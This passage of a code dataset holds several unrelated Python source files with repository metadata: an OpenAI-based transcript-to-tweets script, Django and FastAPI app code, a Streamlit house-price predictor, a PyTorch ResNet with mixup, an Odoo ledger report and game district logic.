viral. I will make sure each tweet is less than 250 characters.\"},\n {\"role\": \"user\", \"content\": \"Excellent, here is the transcript: \" + transcript_text},\n {\"role\": \"system\", \"content\": \"My list will be formatted as: Tweet 1 \\n\\n Tweet 2 \\n\\n Tweet 3 \\n\\n etc.\"}\n\n ],\n max_tokens=900,\n n=1,\n stop=None,\n temperature=0.5,\n )\n\n # Extract the generated tweets from the response\n tweets = response['choices'][0]['message']['content']\n print(tweets)\n\n # Split the tweets into separate parts\n tweets = tweets.split(\"\\n\\n\")\n print(tweets)\n\n # Create a dataframe from the tweets\n df = pd.DataFrame({\"tweet\": tweets})\n df.to_csv('Tweet_Thread.csv')\n\n # Return the tweets as a list\n return tweets\n\n\n\ndef generate_long_form_article(transcript_text,token_len):\n # Generate the article outline using the OpenAI ChatCompletion API\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an expert at writing long-form article outlines that are informative, engaging, and well-researched. Your articles often go viral and are widely shared.\"},\n {\"role\": \"user\", \"content\": \"I have some text that I would like you to use as the basis for a long-form article outline. Please think carefully and do the best job you can to come up with an outline for the article.\"},\n {\"role\": \"system\", \"content\": \"Absolutely, I will provide a comprehensive and well-structured outline for the article based on the content. 
I will provide the result numbered with roman numerals \"},\n {\"role\": \"user\", \"content\": \"Excellent, here is the transcript: \" + transcript_text},\n {\"role\": \"system\", \"content\": \"Here are the sections without any start text, numbered by roman numerals\"}\n\n ],\n max_tokens=3700 - token_len,\n n=1,\n stop=None,\n temperature=0.5,\n )\n\n # Extract the article outline from the response\n outline = response['choices'][0]['message']['content']\n outline_token_count = count_tokens(outline)\n sections = outline.strip().split(\"\\n\\n\")\n parsed_data = []\n for section in sections:\n lines = section.strip().split(\"\\n\")\n section_title = lines[0].strip()\n section_items = [item.strip() for item in lines[1:]]\n parsed_data.append([section_title, section_items])\n \n with open(\"article_outline.txt\", \"w\") as file:\n file.write(str(parsed_data))\n\n\n\n generated_sections = []\n # Loop through each section in the outline\n for section in parsed_data:\n # Generate the section using the OpenAI ChatCompletion API\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are an expert at writing long-form articles that are informative, engaging, and well-researched. Your articles often go viral and are widely shared. You will be given an article outline for context, and instructions on which section of the outline to complete.\"},\n {\"role\": \"user\", \"content\": \"I have a section of an article that I would like you to write for me. Please think carefully and do the best job you can to come up with a well-written and comprehensive section. Please also take into consideration the article's outline so that you can write without overlapping pevious points and build on each section.\"},\n {\"role\": \"system\", \"content\": \"Absolutely, I will provide a comprehensive and well-written section based taking into consideration the outline. 
I will provide only the section text without any additional text\"},\n {\"role\": \"user\", \"content\": \"Excellent, here is the outline to use to understand your goal better: \" + outline + \" and the section to write: \" + str(section)}\n ],\n max_tokens=3700-outline_token_count,\n n=1,\n stop=None,\n temperature=0.2,\n )\n\n # Extract the generated section from the response\n generated_section = response['choices'][0]['message']['content']\n\n\n # Add the generated section to the list of generated sections\n generated_sections.append(generated_section)\n\n # Combine the generated sections into a finished article\n article = \"\\n\\n\".join(generated_sections)\n\n # Save the article to a text file\n with open(\"long_form_article.txt\", \"w\") as file:\n file.write(article)\n\n # Return the article\n return article\n\n\n\n# Get the transcript from the video\ntranscription = get_transcript(\"Your Youtube Video URL\")\n\n# Get the token length of the transcript\ntoken_count = count_tokens(transcription)\nprint(token_count)\n\n\n\n# Summarize with either GPT3 or T5 depending on length of transcript:\nif token_count > 3000:\n summarized_text = summarize_text(transcription)\n new_token_count = count_tokens(summarized_text)\nelse:\n summarized_text = gpt_summarize_transcript(transcription,token_count)\n new_token_count = count_tokens(summarized_text) \n\n\n\n# Generate the tweet thread using the summary\ntweets = generate_tweet_thread(summarized_text)\n\n\n\n# Generate the long-form article using the summary\narticle = generate_long_form_article(summarized_text,new_token_count)\n\n\n\n\n","repo_name":"Phishman81/audio-transcript","sub_path":"backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":10979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41219809003","text":"from django.db import models\nfrom Users.models import Users\nclass Shopcart(models.Model):\n id = models.AutoField(primary_key=True)\n #购买商品\n goods = models.CharField(max_length=20)\n #购买数量\n count = models.IntegerField()\n #添加时间\n add_time = models.TimeField()\n #小记金额\n subtotal = models.IntegerField()\n #所属用户\n users = models.ForeignKey(Users)\n\n\n# Create your models here.\n","repo_name":"wzk1997/commerce","sub_path":"shopcart/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3052913378","text":"import streamlit as st\nimport pandas as pd\nimport streamlit.components.v1 as components\nimport time\nimport numpy as np\nimport pickle\nimport json\nfrom sklearn.ensemble import RandomForestRegressor\nimport altair as alt\n\nwith open('locations.json','r') as f:\n location = json.load(f)\n\n\n\nwith open('mysore_home_prices_model.pickle', 'rb') as f:\n model = pickle.load(f)\n\nwith open(\"columns.json\", \"r\") as f:\n data_columns = json.load(f)['data_columns']\n \n\ndef predict_price(location,ppsqft,area,beds): \n loc_index = data_columns.index(location)\n beds_index = data_columns.index(beds)\n \n x = np.zeros(len(data_columns))\n #x[0] = beds\n x[0] = area\n x[1] = ppsqft\n \n if loc_index >= 0:\n x[loc_index] = 1\n if beds_index >= 0:\n x[beds_index] = 1\n\n return model.predict([x])[0]\n\n@st.cache\ndef load_data():\n data = pd.read_csv('combined_cleaned.csv')\n return data\n\ndata_load_state = st.text('Loading data...')\ndata = load_data()\ndata_load_state.text(\"\")\nlocation_list = 
list(location.keys())\nlocation_list.append('None')\n\n\n## Sidebar code\ncities_filter = st.sidebar.multiselect('Select 2 more locaitons for price comparision', location_list)\nif cities_filter:\n loc_select = st.sidebar.selectbox(\"Select the location\",location_list,index=location_list.index(cities_filter[0]))\nelse:\n loc_select = st.sidebar.selectbox(\"Select the location\",location_list,index=location_list.index('None'))\nbeds_select = st.sidebar.slider('Number of Beds', 1,8) \n\n\n# main page code\nst.markdown(\"\"\"
    House Price Prediction - Mysore
    \"\"\",unsafe_allow_html=True)\n\n\nif loc_select != 'None':\n predicted_price = round(predict_price(loc_select,location[loc_select],(500*beds_select)+500,beds_select),2)\n if predicted_price >= 100:\n st.markdown(f\"\"\" Approximate price of house in `{loc_select}` with `{beds_select}` beds is \"\"\",unsafe_allow_html=True)\n st.markdown(f\"\"\"
    ₹{round(predicted_price/100,2)} Crores
    \"\"\",unsafe_allow_html=True)\n else:\n st.markdown(f\"\"\" Approximate price of house in `{loc_select}` with `{beds_select}` beds is \"\"\",unsafe_allow_html=True)\n st.markdown(f\"\"\"
    ₹{predicted_price} Lakhs
    \"\"\",unsafe_allow_html=True)\n\n\n\n\nchart = alt.Chart(data).mark_bar().encode(\n x='Location',\n y=('average(Price)')\n)\n\n#st.altair_chart(chart)\n\n\nimport matplotlib.pyplot as plt\nplt.style.use('dark_background')\nimport seaborn as sns\n\n\ndef avg_price(location):\n price_list=[]\n no_price_list = []\n location_list = []\n avg_loc_bed = data.groupby(['Location','Beds'])['Price'].mean()\n \n for x in location:\n try:\n price_list.append(avg_loc_bed[x][int(beds_select)])\n location_list.append(x)\n except KeyError:\n no_price_list.append(x)\n\n if len(no_price_list) >= 1:\n st.warning(f'Unfortunately, there are no data avaialbe for {beds_select} beds in {no_price_list} locations ')\n return price_list,location_list\n\nfig, ax = plt.subplots()\nif len(avg_price(cities_filter)[1]) > 1:\n ax.bar(avg_price(cities_filter)[1],avg_price(cities_filter)[0],color = ['#f63366','c'])\n plt.title('Average price comparision for selected locations')\n plt.ylabel('Price in Lakhs')\n plt.xticks(rotation=45)\n plt.xlabel('Location Names')\n st.pyplot(fig)","repo_name":"karthikmprakash/Mysore-Real-Estate-Analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40082987913","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport random\nfrom torch.nn.utils.weight_norm import WeightNorm\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\ndef conv1x1(in_planes, out_planes, stride=1):\n \"\"\"1x1 convolution\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)\n\ndef mixup_data(x, y, lam):\n\n '''Compute the mixup data. 
Return mixed inputs, pairs of targets, and lambda'''\n \n batch_size = x.size()[0]\n index = torch.randperm(batch_size)\n if torch.cuda.is_available():\n index = index.cuda()\n mixed_x = lam * x + (1 - lam) * x[index,:]\n y_a, y_b = y, y[index]\n\n return mixed_x, y_a, y_b, lam\n\nclass distLinear(nn.Module):\n def __init__(self, indim, outdim):\n super(distLinear, self).__init__()\n self.L = nn.Linear( indim, outdim, bias = False)\n self.class_wise_learnable_norm = True #See the issue#4&8 in the github \n if self.class_wise_learnable_norm: \n WeightNorm.apply(self.L, 'weight', dim=0) #split the weight update component to direction and norm \n\n if outdim <=200:\n self.scale_factor = 2; #a fixed scale factor to scale the output of cos value into a reasonably large input for softmax\n else:\n self.scale_factor = 10; #in omniglot, a larger scale factor is required to handle >1000 output classes.\n\n def forward(self, x):\n x_norm = torch.norm(x, p=2, dim =1).unsqueeze(1).expand_as(x)\n x_normalized = x.div(x_norm+ 0.00001)\n if not self.class_wise_learnable_norm:\n L_norm = torch.norm(self.L.weight.data, p=2, dim =1).unsqueeze(1).expand_as(self.L.weight.data)\n self.L.weight.data = self.L.weight.data.div(L_norm + 0.00001)\n cos_dist = self.L(x_normalized) #matrix product by forward function, but when using WeightNorm, this also multiply the cosine distance by a class-wise learnable norm, see the issue#4&8 in the github\n scores = self.scale_factor* (cos_dist) \n\n return scores\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = nn.BatchNorm2d(planes)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, layers, num_classes=200, zero_init_residual=False):\n super(ResNet, self).__init__()\n self.inplanes = 64\n self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1,\n bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n \n self.fc = distLinear(512 * block.expansion, num_classes)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0)\n\n def 
_make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n conv1x1(self.inplanes, planes * block.expansion, stride),\n nn.BatchNorm2d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x, target=None, mixup=False, mixup_hidden = True, mixup_alpha=None, lam=0.4):\n if target is not None: \n if mixup_hidden:\n layer_mix = random.randint(0,5)\n elif mixup:\n layer_mix = 0\n else:\n layer_mix = None\n \n out = x\n \n if layer_mix == 0:\n out, target_a, target_b, lam = mixup_data(out, target, lam=lam)\n \n out = self.relu(self.bn1(self.conv1(x)))\n out = self.layer1(out)\n \n if layer_mix == 1:\n out, target_a, target_b, lam = mixup_data(out, target, lam=lam)\n\n out = self.layer2(out)\n \n if layer_mix == 2:\n out, target_a, target_b, lam = mixup_data(out, target, lam=lam)\n\n out = self.layer3(out)\n \n if layer_mix == 3:\n out, target_a, target_b, lam = mixup_data(out, target, lam=lam)\n\n out = self.layer4(out)\n \n if layer_mix == 4:\n out, target_a, target_b, lam = mixup_data(out, target, lam=lam)\n\n out = self.avgpool(out)\n out = out.view(out.size(0), -1)\n out1 = self.fc.forward(out)\n \n if layer_mix == 5:\n out, target_a, target_b, lam = mixup_data(out, target, lam=lam)\n \n return out, out1, target_a, target_b\n else:\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n out = self.avgpool(out)\n out = out.view(out.size(0), -1) \n out1 = self.fc.forward(out)\n return out, out1\n\ndef resnet18(**kwargs):\n \"\"\"Constructs a ResNet-18 model.\n \"\"\"\n model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)\n return model\n\n\n","repo_name":"yhu01/PT-MAP","sub_path":"res_mixup_model.py","file_name":"res_mixup_model.py","file_ext":"py","file_size_in_byte":7280,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"16"} +{"seq_id":"1462423882","text":"from odoo import models, api, _\n\nclass ReportGeneralLedger(models.AbstractModel):\n _inherit = \"account.general.ledger\"\n \n def _get_reports_buttons(self):\n \"\"\" Add new button for General Ledger view buttons: 'Print Summary' \"\"\"\n result = super()._get_reports_buttons()\n result.append({'name': _('Print Summary'), 'sequence': 8, 'action': 'print_report_summary'})\n return result\n\n def print_report_summary(self, options):\n \"\"\" Generate lines of summarized general ledger data\n @param options: report options\n @return action of printing the report by its XML ID\n with summary_lines and other needed variables as data of the report action (used in report xml template)\n \"\"\"\n data = {}\n summary_lines = []\n \n # unfold all lines in order to get initial balance lines\n options['unfold_all'] = True\n line_ids = self._get_general_ledger_lines(options, line_id=None)\n \n # define dictionary for initial balance values for each account\n initial_balances_dict = {}\n initial_balance_lines = list(filter(lambda l: l.get('az_line_name') == 'initial_balance_line', line_ids))\n for line in initial_balance_lines:\n initial_balances_dict[line.get('account_id').id] = {'initial_balance': line.get('initial_balance', 0),\n 'initial_credit': 
line.get('initial_credit', 0),\n 'initial_debit': line.get('initial_debit', 0)\n }\n \n account_lines = list(filter(lambda l: l.get('az_line_name') == 'account_line', line_ids))\n for account_line in account_lines:\n account = account_line.get('account_id')\n initial_balance = initial_balances_dict.get(account.id)\n # logic:\n # 1- if the account line is unfoldable this means no current balance for it\n # ==> the data belongs to previous period (initial balance), so the current credit and debit are 0 and total balance = initial balance\n # (line is unfoldable means the initial_balance variable is None (no initial balance line))\n # 2- account_line contains total credit and total debit (with initial balance values) so current credit = credit - initial credit, same for debit\n summary_lines.append({'account_number': account.code,\n 'account_name': account.name,\n 'balance': account_line.get('balance', 0),\n 'initial_balance': initial_balance.get('initial_balance', 0) if initial_balance != None else account_line.get('balance', 0),\n 'credit': account_line.get('credit', 0) - initial_balance.get('initial_credit') if initial_balance != None else 0,\n 'debit': account_line.get('debit', 0) - initial_balance.get('initial_debit') if initial_balance != None else 0,\n }) \n \n data['summary_lines'] = summary_lines\n data['options'] = options\n data['totals'] = {\n 'balance': sum([sl.get('balance') for sl in summary_lines]),\n 'initial_balance': sum([sl.get('initial_balance') for sl in summary_lines]),\n 'credit': sum([sl.get('credit') for sl in summary_lines]),\n 'debit': sum([sl.get('debit') for sl in summary_lines]),\n }\n return self.env.ref('azk_general_ledger_summary_report.action_report_general_ledger_summary').report_action(self, data=data)\n\n @api.model\n def _get_account_title_line(self, options, account, amount_currency, debit, credit, balance, has_lines):\n \"\"\" Add some new values to the result dictionary to be used in summary report \"\"\"\n result_dict = super()._get_account_title_line(options, account, amount_currency, debit, credit, balance, has_lines)\n result_dict.update({'az_line_name': 'account_line',\n 'account_id': account,\n 'balance': balance,\n 'credit': credit,\n 'debit': debit\n })\n return result_dict\n\n @api.model\n def _get_initial_balance_line(self, options, account, amount_currency, debit, credit, balance):\n \"\"\" Add some new values to the result dictionary to be used in summary report \"\"\"\n result_dict = super()._get_initial_balance_line(options, account, amount_currency, debit, credit, balance)\n result_dict.update({'az_line_name': 'initial_balance_line',\n 'account_id': account,\n 'initial_balance': balance,\n 'initial_credit': credit,\n 'initial_debit': debit\n })\n return result_dict","repo_name":"BAKHROUSHPOS/Bakhroush-Com","sub_path":"azk_general_ledger_summary_report/models/account_general_ledger.py","file_name":"account_general_ledger.py","file_ext":"py","file_size_in_byte":5101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44329747495","text":"from django.urls import path\n\nfrom . 
import views\n\napp_name = 'person'\n\nurlpatterns = [\n path('', views.RegisterPersonView.as_view(), name='register'),\n path('listagem/', views.ListPersonView.as_view(), name='listing'),\n path(\n 'atualizar/', views.UpdatePersonView.as_view(), name='update'\n ),\n path('deletar/', views.DeletePersonView.as_view(), name='delete'),\n]\n","repo_name":"Ricardo-Jackson-Ferrari/Teste-pratico-Projeto-em-Django","sub_path":"apps/person/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42710198124","text":"from typing import Dict, List\n\nfrom fastapi import APIRouter, Depends\nfrom sqlalchemy.orm import Session\n\nfrom app.api.deps import get_current_user_is_approved, get_db\nfrom app.crud import analysis\nfrom app.db.models.user import UsersDBModel\nfrom app.schemas.analysis import AnalysisGetModel\nfrom app.utils.aws import generate_download_url\n\nrouter = APIRouter()\n\n\n@router.post(\"/get\")\nasync def get(\n request_data: AnalysisGetModel,\n current_user: UsersDBModel = Depends(get_current_user_is_approved),\n db: Session = Depends(get_db),\n):\n analysis_data = await analysis.get_by_user_with_images(\n db, current_user.id, request_data\n )\n return {\"result\": list(process_data(analysis_data).values())}\n\n\ndef process_data(analysis_data: List[Dict]) -> Dict:\n data = {}\n for el in analysis_data:\n el = {key: val for key, val in el.items()}\n if el[\"analysis_id\"] not in data:\n data[el[\"analysis_id\"]] = {\n \"comment\": el[\"comment\"],\n \"created_at\": el[\"created_at\"],\n \"images\": [],\n }\n\n data[el[\"analysis_id\"]][\"images\"].append(\n {\n \"position\": el[\"position\"],\n \"url\": generate_download_url(el[\"filename\"], el[\"content_type\"]),\n }\n )\n\n return data\n","repo_name":"kilimangara/e-health-backend","sub_path":"app/api/api_v1/endpoints/analysis/get_by_category.py","file_name":"get_by_category.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27104421174","text":"import asyncio\nimport math\nimport time\n\nimport discord\n\nimport ewcfg\nimport ewstats\nimport ewutils\nimport ewrolemgr\nfrom ew import EwUser\nfrom ewmarket import EwMarket\n\n\"\"\"\n\tdistrict data model for database persistence\n\"\"\"\nclass EwDistrict:\n\tid_server = \"\"\n\n\t# The district's identifying string\n\tname = \"\"\n\n\t# The faction currently controlling this district\n\tcontrolling_faction = \"\"\n\n\t# The faction currently capturing this district\n\tcapturing_faction = \"\"\n\n\t# The amount of progress made on the capture\n\tcapture_points = 0\n\n\t# The property class of the district\n\tproperty_class = \"\"\n\n\t# The amount of CP it takes for the district to be captured\n\tmax_capture_points = 0\n\n\t# The amount of slime in the district\n\tslimes = 0\n\n\t# Time until the district unlocks for capture again\n\ttime_unlock = 0\n\n\tdef __init__(self, id_server = None, district = None):\n\t\tif id_server is not None and district is not None:\n\t\t\tself.id_server = id_server\n\t\t\tself.name = district\n\n\t\t\t# find the district's property class\n\t\t\tfor poi in ewcfg.poi_list:\n\t\t\t\tif poi.id_poi == self.name:\n\t\t\t\t\tself.property_class = poi.property_class.lower()\n\n\t\t\tif len(self.property_class) > 0:\n\t\t\t\tself.max_capture_points = 
ewcfg.max_capture_points[self.property_class]\n\t\t\telse:\n\t\t\t\tself.max_capture_points = 0\n\n\t\t\tdata = ewutils.execute_sql_query(\"SELECT {controlling_faction}, {capturing_faction}, {capture_points},{slimes}, {time_unlock} FROM districts WHERE id_server = %s AND {district} = %s\".format(\n\t\t\t\tcontrolling_faction = ewcfg.col_controlling_faction,\n\t\t\t\tcapturing_faction = ewcfg.col_capturing_faction,\n\t\t\t\tcapture_points = ewcfg.col_capture_points,\n\t\t\t\tdistrict = ewcfg.col_district,\n\t\t\t\tslimes = ewcfg.col_district_slimes,\n\t\t\t\ttime_unlock = ewcfg.col_time_unlock,\n\t\t\t), (\n\t\t\t\tid_server,\n\t\t\t\tdistrict\n\t\t\t))\n\n\t\t\tif len(data) > 0: # if data is not empty, i.e. it found an entry\n\t\t\t\t# data is always a two-dimensional array and if we only fetch one row, we have to type data[0][x]\n\t\t\t\tself.controlling_faction = data[0][0]\n\t\t\t\tself.capturing_faction = data[0][1]\n\t\t\t\tself.capture_points = data[0][2]\n\t\t\t\tself.slimes = data[0][3]\n\t\t\t\tself.time_unlock = data[0][4]\n\t\t\t\t# ewutils.logMsg(\"EwDistrict object '\" + self.name + \"' created. Controlling faction: \" + self.controlling_faction + \"; Capture progress: %d\" % self.capture_points)\n\t\t\telse: # create new entry\n\t\t\t\tewutils.execute_sql_query(\"REPLACE INTO districts ({id_server}, {district}) VALUES (%s, %s)\".format(\n\t\t\t\t\tid_server = ewcfg.col_id_server,\n\t\t\t\t\tdistrict = ewcfg.col_district\n\t\t\t\t), (\n\t\t\t\t\tid_server,\n\t\t\t\t\tdistrict\n\t\t\t\t))\n\n\tdef persist(self):\n\t\tewutils.execute_sql_query(\"REPLACE INTO districts(id_server, {district}, {controlling_faction}, {capturing_faction}, {capture_points}, {slimes}, {time_unlock}) VALUES(%s, %s, %s, %s, %s, %s, %s)\".format(\n\t\t\tdistrict = ewcfg.col_district,\n\t\t\tcontrolling_faction = ewcfg.col_controlling_faction,\n\t\t\tcapturing_faction = ewcfg.col_capturing_faction,\n\t\t\tcapture_points = ewcfg.col_capture_points,\n\t\t\tslimes = ewcfg.col_district_slimes,\n\t\t\ttime_unlock = ewcfg.col_time_unlock,\n\t\t), (\n\t\t\tself.id_server,\n\t\t\tself.name,\n\t\t\tself.controlling_faction,\n\t\t\tself.capturing_faction,\n\t\t\tself.capture_points,\n\t\t\tself.slimes,\n\t\t\tself.time_unlock,\n\t\t))\n\t\n\tdef get_number_of_friendly_neighbors(self):\n\t\tif self.controlling_faction == \"\":\n\t\t\treturn 0\n\t\tneighbors = ewcfg.poi_neighbors[self.name]\n\t\tfriendly_neighbors = 0\n\n\t\tfor neighbor_id in neighbors:\n\t\t\tneighbor_data = EwDistrict(id_server = self.id_server, district = neighbor_id)\n\t\t\tif neighbor_data.controlling_faction == self.controlling_faction:\n\t\t\t\tfriendly_neighbors += 1\n\t\treturn friendly_neighbors\n\n\tdef all_neighbors_friendly(self):\n\t\tif self.controlling_faction == \"\":\n\t\t\treturn False\n\t\t\n\t\tneighbors = ewcfg.poi_neighbors[self.name]\n\t\tfor neighbor_id in neighbors:\n\t\t\tneighbor_poi = ewcfg.id_to_poi.get(neighbor_id)\n\t\t\tneighbor_data = EwDistrict(id_server = self.id_server, district = neighbor_id)\n\t\t\tif neighbor_data.controlling_faction != self.controlling_faction and not neighbor_poi.is_subzone and not neighbor_poi.is_outskirts:\n\t\t\t\treturn False\n\t\treturn True\n\n\tdef get_players_in_district(self,\n\t\t\tmin_level = 0,\n\t\t\tmax_level = math.inf,\n\t\t\tlife_states = [],\n\t\t\tfactions = [],\n\t\t\tmin_slimes = -math.inf,\n\t\t\tmax_slimes = math.inf,\n\t\t\tignore_offline = False,\n\t\t\tpvp_only = False\n\t\t):\n\t\tclient = ewutils.get_client()\n\t\tserver = client.get_server(self.id_server)\n\t\tif 
server == None:\n\t\t\tewutils.logMsg(\"error: couldn't find server with id {}\".format(self.id_server))\n\t\t\treturn []\n\t\ttime_now = int(time.time())\n\n\t\tplayers = ewutils.execute_sql_query(\"SELECT {id_user}, {slimes}, {slimelevel}, {faction}, {life_state}, {time_expirpvp} FROM users WHERE id_server = %s AND {poi} = %s\".format(\n\t\t\tid_user = ewcfg.col_id_user,\n\t\t\tslimes = ewcfg.col_slimes,\n\t\t\tslimelevel = ewcfg.col_slimelevel,\n\t\t\tfaction = ewcfg.col_faction,\n\t\t\tlife_state = ewcfg.col_life_state,\n\t\t\tpoi = ewcfg.col_poi,\n\t\t\ttime_expirpvp = ewcfg.col_time_expirpvp\n\t\t),(\n\t\t\tself.id_server,\n\t\t\tself.name\n\t\t))\n\n\t\tfiltered_players = []\n\t\tfor player in players:\n\t\t\tid_user = player[0]\n\t\t\tslimes = player[1]\n\t\t\tslimelevel = player[2]\n\t\t\tfaction = player[3]\n\t\t\tlife_state = player[4]\n\t\t\ttime_expirpvp = player[5]\n\t\t\t\n\t\t\tmember = server.get_member(id_user)\n\n\t\t\tif member != None:\n\t\t\t\tif max_level >= slimelevel >= min_level \\\n\t\t\t\tand max_slimes >= slimes >= min_slimes \\\n\t\t\t\tand (len(life_states) == 0 or life_state in life_states) \\\n\t\t\t\tand (len(factions) == 0 or faction in factions) \\\n\t\t\t\tand not (ignore_offline and member.status == discord.Status.offline) \\\n\t\t\t\tand not (pvp_only and time_expirpvp < time_now):\n\t\t\t\t\tfiltered_players.append(id_user)\n\n\t\treturn filtered_players\n\n\tdef get_enemies_in_district(self,\n\t\t\tmin_level = 0,\n\t\t\tmax_level = math.inf,\n\t\t\tmin_slimes = -math.inf,\n\t\t\tmax_slimes = math.inf,\n\t\t\tscout_used = False,\n\t\t):\n\n\t\tclient = ewutils.get_client()\n\t\tserver = client.get_server(self.id_server)\n\t\tif server == None:\n\t\t\tewutils.logMsg(\"error: couldn't find server with id {}\".format(self.id_server))\n\t\t\treturn []\n\n\t\tenemies = ewutils.execute_sql_query(\"SELECT {id_enemy}, {slimes}, {level}, {enemytype} FROM enemies WHERE id_server = %s AND {poi} = %s AND {life_state} = 1\".format(\n\t\t\tid_enemy = ewcfg.col_id_enemy,\n\t\t\tslimes = ewcfg.col_enemy_slimes,\n\t\t\tlevel = ewcfg.col_enemy_level,\n\t\t\tenemytype = ewcfg.col_enemy_type,\n\t\t\tpoi = ewcfg.col_enemy_poi,\n\t\t\tlife_state = ewcfg.col_enemy_life_state\n\t\t),(\n\t\t\tself.id_server,\n\t\t\tself.name\n\t\t))\n\n\t\tfiltered_enemies = []\n\t\tfor enemy_data_column in enemies:\n\n\t\t\tfetched_id_enemy = enemy_data_column[0] # data from id_enemy column in enemies table\n\t\t\tfetched_slimes = enemy_data_column[1] # data from slimes column in enemies table\n\t\t\tfetched_level = enemy_data_column[2] # data from level column in enemies table\n\t\t\tfetched_type = enemy_data_column[3] # data from enemytype column in enemies table\n\n\t\t\t# Append the enemy to the list if it meets the requirements\n\t\t\tif max_level >= fetched_level >= min_level \\\n\t\t\tand max_slimes >= fetched_slimes >= min_slimes:\n\t\t\t\tfiltered_enemies.append(fetched_id_enemy)\n\t\t\t\t\n\t\t\t# Don't show sandbags on !scout\n\t\t\tif scout_used and fetched_type == ewcfg.enemy_type_sandbag:\n\t\t\t\tfiltered_enemies.remove(fetched_id_enemy)\n\n\t\treturn filtered_enemies\n\n\tdef decay_capture_points(self):\n\t\tresp_cont_decay = ewutils.EwResponseContainer(client = ewutils.get_client(), id_server = self.id_server)\n\t\tif self.capture_points > 0 and self.time_unlock == 0:\n\n\t\t\tneighbors = ewcfg.poi_neighbors[self.name]\n\t\t\tall_neighbors_friendly = self.all_neighbors_friendly()\n\n\n\t\t\tdecay = -math.ceil(ewcfg.max_capture_points_a / (ewcfg.ticks_per_day * 
ewcfg.decay_modifier))\n\n\t\t\tslimeoids = ewutils.get_slimeoids_in_poi(poi = self.name, id_server = self.id_server, sltype = ewcfg.sltype_nega)\n\t\t\t\n\t\t\tnega_present = len(slimeoids) > 0\n\t\t\t\n\t\t\tif nega_present:\n\t\t\t\tdecay *= 1.5\n\n\n\t\t\tif self.controlling_faction == \"\" or not all_neighbors_friendly or nega_present: # don't decay if the district is completely surrounded by districts controlled by the same faction\n\t\t\t\t# reduces the capture progress at a rate with which it arrives at 0 after 1 in-game day\n\t\t\t\tresponses = self.change_capture_points(int(decay), ewcfg.actor_decay)\n\t\t\t\tresp_cont_decay.add_response_container(responses)\n\n\t\tif self.capture_points < 0:\n\t\t\tself.capture_points = 0\n\n\t\tif self.capture_points == 0:\n\t\t\tif self.controlling_faction != \"\": # if it was owned by a faction\n\n\t\t\t\tmessage = \"The {faction} have lost control over {district} because of sheer negligence.\".format(\n\t\t\t\t\tfaction = self.controlling_faction,\n\t\t\t\t\tdistrict = 